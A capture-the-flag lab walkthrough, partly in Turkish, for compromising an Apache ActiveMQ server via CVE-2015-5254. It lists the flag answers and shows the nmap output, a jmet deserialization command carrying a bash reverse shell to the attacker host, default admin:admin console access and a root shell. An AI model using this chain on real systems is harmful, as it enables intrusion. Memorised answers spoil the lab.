# Hack Web Services! Part - 2 ActiveMQ 


**Açıklama**:

CyberPath Bank sizi sızma testi sağlayıcısı olarak işe aldı. Bu hafta iç ağda bulunan servisleri test etmeniz istendi. Bugün ActiveMQ çalıştıran sistemin güvenliğini test edeceksiniz. İç ağa bağlı ve içinde gerekli toollar olan attacker makine size sağlandı.

Apache ActiveMQ, eksiksiz bir Java İleti Hizmeti istemcisiyle birlikte Java'da yazılmış açık kaynaklı bir ileti aracısıdır.  Bu durumda, birden fazla istemci veya sunucudan gelen iletişimi teşvik etmek anlamına gelen "Kurumsal Özellikler" sağlar.


**Amaç**:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Çalışan zaafiyetli servisin versiyonunu bulmak.
- Zaafiyetli servisin CVE ID'sini bulmak.
- Server'ı ele geçirmek.

**Flags**:
- Hedefte açık olan toplam port sayısı?
    - answer: **7**
- Vulnrable servisin ismi?
    - answer: **apachemq ActiveMQ OpenWire transport**
- CVulnrable servise ait CVE?
    - answer: **CVE-2015-5254**
- flag.txt?
    - answer: **CyberPath{eSAem7gh2p4S4EZf}**

## **Solution**:

### **Enum**:

```bash
attacker@cyberpath:~$ ls    
Desktop Documents Downloads Music Pictures Videos jmet-0.1.0-all.jar

attacker@cyberpath:~$ ifconfig
eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet 10.0.0.2  netmask 255.255.255.0  broadcast 10.0.0.255
        ether 02:42:0a:00:00:02  txqueuelen 0  (Ethernet)
        RX packets 70960  bytes 61543482 (61.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 70239  bytes 11610173 (11.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3241  bytes 5917234 (5.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3241  bytes 5917234 (5.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

attacker@cyberpath:~$ nmap -sC -sV --script vuln 10.0.0.26 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-07 09:56 UTC
Stats: 0:01:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 85.71% done; ETC: 09:57 (0:00:10 remaining)
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 85.71% done; ETC: 09:57 (0:00:11 remaining)
Stats: 0:04:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.11% done; ETC: 10:00 (0:00:01 remaining)
Stats: 0:05:31 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.11% done; ETC: 10:01 (0:00:01 remaining)
Nmap scan report for activemq_1_web_1.activemq_1_internal_network (10.0.0.26)
Host is up (0.000071s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE    VERSION
1883/tcp  open  mqtt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mqtt-subscribe: ERROR: Script execution failed (use -d to debug)
5672/tcp  open  amqp?
|_amqp-info: ERROR: AMQP:handshake connection closed unexpectedly while reading frame header
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GetRequest, HTTPOptions, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|_    AMQP
8161/tcp  open  http       Jetty 8.1.16.v20140903
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn&apos;t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn&apos;t find any DOM based XSS.
| http-enum: 
|   /admin/: Possible admin folder (401 Unauthorized)
|   /admin/admin/: Possible admin folder (401 Unauthorized)
|   /admin/account.php: Possible admin folder (401 Unauthorized)
|   /admin/index.php: Possible admin folder (401 Unauthorized)
|   /admin/login.php: Possible admin folder (401 Unauthorized)
|   /admin/admin.php: Possible admin folder (401 Unauthorized)
|   /admin/index.html: Possible admin folder (401 Unauthorized)
|   /admin/login.html: Possible admin folder (401 Unauthorized)
|   /admin/admin.html: Possible admin folder (401 Unauthorized)
|   /admin/home.php: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.php: Possible admin folder (401 Unauthorized)
|   /admin/account.html: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.html: Possible admin folder (401 Unauthorized)
|   /admin/cp.php: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.php: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.php: Possible admin folder (401 Unauthorized)
|   /admin/home.html: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.html: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.html: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.html: Possible admin folder (401 Unauthorized)
|   /admin/cp.html: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.php: Possible admin folder (401 Unauthorized)
|   /admin/account.cfm: Possible admin folder (401 Unauthorized)
|   /admin/index.cfm: Possible admin folder (401 Unauthorized)
|   /admin/login.cfm: Possible admin folder (401 Unauthorized)
|   /admin/admin.cfm: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.cfm: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.cfm: Possible admin folder (401 Unauthorized)
|   /admin/cp.cfm: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.cfm: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.cfm: Possible admin folder (401 Unauthorized)
|   /admin/home.cfm: Possible admin folder (401 Unauthorized)
|   /admin/account.asp: Possible admin folder (401 Unauthorized)
|   /admin/index.asp: Possible admin folder (401 Unauthorized)
|   /admin/login.asp: Possible admin folder (401 Unauthorized)
|   /admin/admin.asp: Possible admin folder (401 Unauthorized)
|   /admin/home.asp: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.asp: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.asp: Possible admin folder (401 Unauthorized)
|   /admin/cp.asp: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.asp: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.asp: Possible admin folder (401 Unauthorized)
|   /admin/account.aspx: Possible admin folder (401 Unauthorized)
|   /admin/index.aspx: Possible admin folder (401 Unauthorized)
|   /admin/login.aspx: Possible admin folder (401 Unauthorized)
|   /admin/admin.aspx: Possible admin folder (401 Unauthorized)
|   /admin/home.aspx: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.aspx: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.aspx: Possible admin folder (401 Unauthorized)
|   /admin/cp.aspx: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.aspx: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.aspx: Possible admin folder (401 Unauthorized)
|   /account.jsp: Possible admin folder (401 Unauthorized)
|   /admin/index.jsp: Possible admin folder (401 Unauthorized)
|   /admin/login.jsp: Possible admin folder (401 Unauthorized)
|   /admin/admin.jsp: Possible admin folder (401 Unauthorized)
|   /admin_area/admin.jsp: Possible admin folder (401 Unauthorized)
|   /admin_area/login.jsp: Possible admin folder (401 Unauthorized)
|   /admin_area/index.jsp: Possible admin folder (401 Unauthorized)
|   /bb-admin/index.jsp: Possible admin folder (401 Unauthorized)
|   /bb-admin/login.jsp: Possible admin folder (401 Unauthorized)
|   /bb-admin/admin.jsp: Possible admin folder (401 Unauthorized)
|   /admin/home.jsp: Possible admin folder (401 Unauthorized)
|   /admin/controlpanel.jsp: Possible admin folder (401 Unauthorized)
|   /admin.jsp: Possible admin folder (401 Unauthorized)
|   /pages/admin/admin-login.jsp: Possible admin folder (401 Unauthorized)
|   /admin/admin-login.jsp: Possible admin folder (401 Unauthorized)
|   /admin-login.jsp: Possible admin folder (401 Unauthorized)
|   /admin/cp.jsp: Possible admin folder (401 Unauthorized)
|   /cp.jsp: Possible admin folder (401 Unauthorized)
|   /administrator/account.jsp: Possible admin folder (401 Unauthorized)
|   /administrator.jsp: Possible admin folder (401 Unauthorized)
|   /login.jsp: Possible admin folder (401 Unauthorized)
|   /modelsearch/login.jsp: Possible admin folder (401 Unauthorized)
|   /moderator.jsp: Possible admin folder (401 Unauthorized)
|   /moderator/login.jsp: Possible admin folder (401 Unauthorized)
|   /administrator/login.jsp: Possible admin folder (401 Unauthorized)
|   /moderator/admin.jsp: Possible admin folder (401 Unauthorized)
|   /controlpanel.jsp: Possible admin folder (401 Unauthorized)
|   /user.jsp: Possible admin folder (401 Unauthorized)
|   /admincp/index.jsp: Possible admin folder (401 Unauthorized)
|   /admincp/login.jsp: Possible admin folder (401 Unauthorized)
|   /admincontrol.jsp: Possible admin folder (401 Unauthorized)
|   /admin/account.jsp: Possible admin folder (401 Unauthorized)
|   /adminpanel.jsp: Possible admin folder (401 Unauthorized)
|   /webadmin.jsp: Possible admin folder (401 Unauthorized)
|   /webadmin/index.jsp: Possible admin folder (401 Unauthorized)
|   /webadmin/admin.jsp: Possible admin folder (401 Unauthorized)
|   /webadmin/login.jsp: Possible admin folder (401 Unauthorized)
|   /admin/admin_login.jsp: Possible admin folder (401 Unauthorized)
|   /admin_login.jsp: Possible admin folder (401 Unauthorized)
|   /panel-administracion/login.jsp: Possible admin folder (401 Unauthorized)
|   /adminLogin.jsp: Possible admin folder (401 Unauthorized)
|   /admin/adminLogin.jsp: Possible admin folder (401 Unauthorized)
|   /home.jsp: Possible admin folder (401 Unauthorized)
|   /adminarea/index.jsp: Possible admin folder (401 Unauthorized)
|   /adminarea/admin.jsp: Possible admin folder (401 Unauthorized)
|   /adminarea/login.jsp: Possible admin folder (401 Unauthorized)
|   /panel-administracion/index.jsp: Possible admin folder (401 Unauthorized)
|   /panel-administracion/admin.jsp: Possible admin folder (401 Unauthorized)
|   /modelsearch/index.jsp: Possible admin folder (401 Unauthorized)
|   /modelsearch/admin.jsp: Possible admin folder (401 Unauthorized)
|   /administrator/index.jsp: Possible admin folder (401 Unauthorized)
|   /admincontrol/login.jsp: Possible admin folder (401 Unauthorized)
|   /adm/admloginuser.jsp: Possible admin folder (401 Unauthorized)
|   /admloginuser.jsp: Possible admin folder (401 Unauthorized)
|   /admin2.jsp: Possible admin folder (401 Unauthorized)
|   /admin2/login.jsp: Possible admin folder (401 Unauthorized)
|   /admin2/index.jsp: Possible admin folder (401 Unauthorized)
|   /adm/index.jsp: Possible admin folder (401 Unauthorized)
|   /adm.jsp: Possible admin folder (401 Unauthorized)
|   /adm_auth.jsp: Possible admin folder (401 Unauthorized)
|   /memberadmin.jsp: Possible admin folder (401 Unauthorized)
|   /administratorlogin.jsp: Possible admin folder (401 Unauthorized)
|   /siteadmin/login.jsp: Possible admin folder (401 Unauthorized)
|   /siteadmin/index.jsp: Possible admin folder (401 Unauthorized)
|   /administr8.jsp: Possible admin folder (401 Unauthorized)
|   /administracao.jsp: Possible admin folder (401 Unauthorized)
|   /administracion.jsp: Possible admin folder (401 Unauthorized)
|   /admins.jsp: Possible admin folder (401 Unauthorized)
|   /AdminLogin.jsp: Possible admin folder (401 Unauthorized)
|   /admin/backup/: Possible backup (401 Unauthorized)
|   /admin/download/backup.sql: Possible database backup (401 Unauthorized)
|   /atom.jsp: RSS or Atom feed (401 Unauthorized)
|   /rss.jsp: RSS or Atom feed (401 Unauthorized)
|   /login.jsp: Login page (401 Unauthorized)
|   /log.jsp: Logs (401 Unauthorized)
|   /logs.jsp: Logs (401 Unauthorized)
|   /admin/upload.php: Admin File Upload (401 Unauthorized)
|   /console/login/loginForm.jsp: Oracle WebLogic Server Administration Console (401 Unauthorized)
|   /admin/CiscoAdmin.jhtml: Cisco Collaboration Server (401 Unauthorized)
|   /intruvert/jsp/module/Login.jsp: McAfee Network Security Manager (401 Unauthorized)
|   /ReqWebHelp/advanced/workingSet.jsp: IBM Rational RequisitePro/ReqWebHelp (401 Unauthorized)
|   /mxportal/home/MxPortalFrames.jsp: HP Insight Manager (401 Unauthorized)
|   /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 (401 Unauthorized)
|   /happyaxis.jsp: Apache Axis2 (401 Unauthorized)
|   /web-console/ServerInfo.jsp: JBoss Console (401 Unauthorized)
|   /admin/libraries/ajaxfilemanager/ajaxfilemanager.php: Log1 CMS (401 Unauthorized)
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload (401 Unauthorized)
|   /admin/includes/tiny_mce/plugins/tinybrowser/upload.php: CompactCMS or B-Hind CMS/FCKeditor File upload (401 Unauthorized)
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload (401 Unauthorized)
|   /admin/jscript/upload.php: Lizard Cart/Remote File upload (401 Unauthorized)
|   /admin/jscript/upload.html: Lizard Cart/Remote File upload (401 Unauthorized)
|   /admin/jscript/upload.pl: Lizard Cart/Remote File upload (401 Unauthorized)
|   /admin/jscript/upload.asp: Lizard Cart/Remote File upload (401 Unauthorized)
|_  /admin/environment.xml: Moodle files (401 Unauthorized)
|_http-server-header: Jetty(8.1.16.v20140903)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server&apos;s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn&apos;t find any stored XSS vulnerabilities.
33531/tcp open  tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
61613/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:266)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:75)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:214)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:196)
|_    java.lang.Thread.run(Thread.java:722)
61614/tcp open  http       Jetty 8.1.16.v20140903
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn&apos;t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn&apos;t find any DOM based XSS.
|_http-server-header: Jetty(8.1.16.v20140903)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server&apos;s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn&apos;t find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
61616/tcp open  apachemq   ActiveMQ OpenWire transport
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     MaxFrameSize
|     CacheSize
|     CacheEnabled
|     SizePrefixDisabled
|     MaxInactivityDurationInitalDelay
|     TcpNoDelayEnabled
|     MaxInactivityDuration
|     TightEncodingEnabled
|_    StackTraceEnabled
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5672-TCP:V=7.80%I=7%D=3/7%Time=6225D6CC%P=x86_64-pc-linux-gnu%r(Get
SF:Request,8,&quot;AMQP\0\x01\0\0&quot;)%r(HTTPOptions,8,&quot;AMQP\0\x01\0\0&quot;)%r(RTSPReq
SF:uest,8,&quot;AMQP\0\x01\0\0&quot;)%r(RPCCheck,8,&quot;AMQP\0\x01\0\0&quot;)%r(DNSVersionBin
SF:dReqTCP,8,&quot;AMQP\0\x01\0\0&quot;)%r(DNSStatusRequestTCP,8,&quot;AMQP\0\x01\0\0&quot;)%r
SF:(SSLSessionReq,8,&quot;AMQP\0\x01\0\0&quot;)%r(TerminalServerCookie,8,&quot;AMQP\0\x01
SF:\0\0&quot;)%r(TLSSessionReq,8,&quot;AMQP\0\x01\0\0&quot;)%r(Kerberos,8,&quot;AMQP\0\x01\0\0
SF:&quot;)%r(SMBProgNeg,8,&quot;AMQP\0\x01\0\0&quot;)%r(X11Probe,8,&quot;AMQP\0\x01\0\0&quot;)%r(Fo
SF:urOhFourRequest,8,&quot;AMQP\0\x01\0\0&quot;)%r(LPDString,8,&quot;AMQP\0\x01\0\0&quot;)%r(L
SF:DAPSearchReq,8,&quot;AMQP\0\x01\0\0&quot;)%r(LDAPBindReq,8,&quot;AMQP\0\x01\0\0&quot;)%r(SI
SF:POptions,8,&quot;AMQP\0\x01\0\0&quot;)%r(LANDesk-RC,8,&quot;AMQP\0\x01\0\0&quot;)%r(Termina
SF:lServer,8,&quot;AMQP\0\x01\0\0&quot;)%r(NCP,8,&quot;AMQP\0\x01\0\0&quot;)%r(NotesRPC,8,&quot;AMQ
SF:P\0\x01\0\0&quot;)%r(WMSRequest,8,&quot;AMQP\0\x01\0\0&quot;)%r(oracle-tns,8,&quot;AMQP\0\x
SF:01\0\0&quot;)%r(ms-sql-s,8,&quot;AMQP\0\x01\0\0&quot;)%r(afp,8,&quot;AMQP\0\x01\0\0&quot;)%r(gio
SF:p,8,&quot;AMQP\0\x01\0\0&quot;);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61613-TCP:V=7.80%I=7%D=3/7%Time=6225D6CC%P=x86_64-pc-linux-gnu%r(HE
SF:LP4STOMP,27F,&quot;ERROR\ncontent-type:text/plain\nmessage:Unknown\x20STOMP\
SF:x20action:\x20HELP\n\norg\.apache\.activemq\.transport\.stomp\.Protocol
SF:Exception:\x20Unknown\x20STOMP\x20action:\x20HELP\n\tat\x20org\.apache\
SF:.activemq\.transport\.stomp\.ProtocolConverter\.onStompCommand\(Protoco
SF:lConverter\.java:266\)\n\tat\x20org\.apache\.activemq\.transport\.stomp
SF:\.StompTransportFilter\.onCommand\(StompTransportFilter\.java:75\)\n\ta
SF:t\x20org\.apache\.activemq\.transport\.TransportSupport\.doConsume\(Tra
SF:nsportSupport\.java:83\)\n\tat\x20org\.apache\.activemq\.transport\.tcp
SF:\.TcpTransport\.doRun\(TcpTransport\.java:214\)\n\tat\x20org\.apache\.a
SF:ctivemq\.transport\.tcp\.TcpTransport\.run\(TcpTransport\.java:196\)\n\
SF:tat\x20java\.lang\.Thread\.run\(Thread\.java:722\)\n\0\n&quot;);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61616-TCP:V=7.80%I=7%D=3/7%Time=6225D6C7%P=x86_64-pc-linux-gnu%r(NU
SF:LL,F4,&quot;\0\0\0\xf0\x01ActiveMQ\0\0\0\n\x01\0\0\0\xde\0\0\0\t\0\x0cMaxFra
SF:meSize\x06\0\0\0\0\x06@\0\0\0\tCacheSize\x05\0\0\x04\0\0\x0cCacheEnable
SF:d\x01\x01\0\x12SizePrefixDisabled\x01\0\0\x20MaxInactivityDurationInita
SF:lDelay\x06\0\0\0\0\0\0&apos;\x10\0\x11TcpNoDelayEnabled\x01\x01\0\x15MaxInac
SF:tivityDuration\x06\0\0\0\0\0\0u0\0\x14TightEncodingEnabled\x01\x01\0\x1
SF:1StackTraceEnabled\x01\x01&quot;);

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 385.80 seconds
</pre>
```

### **Explotation**:

- Following command will trigger vulnrability and create job at activemq. `/usr/lib/jvm/java-8-openjdk-amd64/bin/java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" -Yp ROME 10.0.0.26 61616`

- Visit `http://10.0.0.26:8161/admin/browse.jsp?JMSDestination=Event` to see all messages in queue. We can login with admin:admin credentials.

![1](1.PNG)
![2](2.PNG)

- Listen port with `sudo nc -lvnp 4444` and click the message we created with java payload. We will get reverse shell from target.

![3](3.PNG)

```bash
attacker@cyberpath:~/Desktop$ sudo nc -lvnp 4444
[sudo] password for attacker: 
Listening on 0.0.0.0 4444
Connection received on 10.0.0.26 40604
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@cabef6177536:/opt/apache-activemq-5.11.1# cd /
ls
bin
boot
dev
docker-java-home
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
root@cabef6177536:/# cat flag.txt
cat flag.txt
Cyberpath{flag}
root@cabef6177536:/# 
```